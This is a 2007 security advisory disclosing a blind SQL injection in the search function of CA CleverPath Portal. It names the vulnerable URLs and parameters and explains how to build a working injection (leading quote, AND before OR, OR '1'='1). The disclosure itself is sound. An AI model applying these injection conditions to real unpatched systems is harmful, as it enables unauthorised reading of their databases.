Security Advisory: CA CleverPath SQL Injection

Background

The CA Clever Path Portal is a customizable portal for aggregation and integration of data and applications. It is integrated into multiple CA products including various Unicenter components. The CA CleverPath utilizes a back end Database for storing data and allows usage of either built in or external Database.

Scope

After identifying in CleverPath an irregular behavior when modifying query parameters in the search mechanism, Hacktics conducted research to identify an SQL Injection vulnerability in the implementation of the search query construction.

The Finding

After identifying in CleverPath an irregular behavior when modifying query parameters in the search mechanism, Hacktics conducted research to identify an SQL Injection vulnerability in the implementation of the search query construction.

Details

The light search URL is:
 
https://foo.bar:fooport/servlet/portal/search/ execute?CHARSET=UTF-8&showtemplate=false& OFINTEREST=PARAM&showtemplate=false

The advanced search URL is:
 
https://foo.bar:fooport/servlet/portal/search/ execute?CHARSET=UTF-8&showtemplate=false& Search=Search&TITLE=&DESCRIPTION=PARAM& FILENAME=&OWNERNAME=&GROUPNAME=& DATES=NONE&ResultCount=20&CREATE_OPT=0& MODIFIED_OPT=0&MODIFIED_BAFT=&MODIFIED_ BAFT_YEAR=&MODIFIED_BAFT_MONTH=&MODIFIED _BAFT_DAY=&MODIFIED_TO_YEAR=&MODIFIED _TO_MONTH=&MODIFIED_TO_DAY=&MODIFIED_ FROM_YEAR=&MODIFIED_FROM_MONTH=& MODIFIED_FROM_DAY=

By replacing some of the search parameters, i.e. ofinterest in the light search, or description in the advanced search, it is possible to inject SQL syntax and modify the query sent to the database, thus modifying the query results. It is important to note that it is not possible to utilize conventional injection techniques such as union select, and the injection is only exploitable via the binary search attack vector as described by Sverre H. Huseby in his posting Using Binary Search with SQL Injection.
 
Note: The injection only occurs if the first character of the input is the " ' " (single quote character). It is also important that the AND operand appears before the OR operand in the injection string, and also that the OR '1'='1 operand appears in the query. Otherwise no results are returned even if the condition of the AND clause is true.

Affected Systems

Multiple CA products and 3rd party products utilizing the CleverPath Portal

Solution

CA has been notified of this vulnerability on January 18th, and has released a patch correcting the problem.

Credit

The vulnerability was discovered on January 18th, 2007, by Irene Abezgauz, as part of Hacktics' research activities.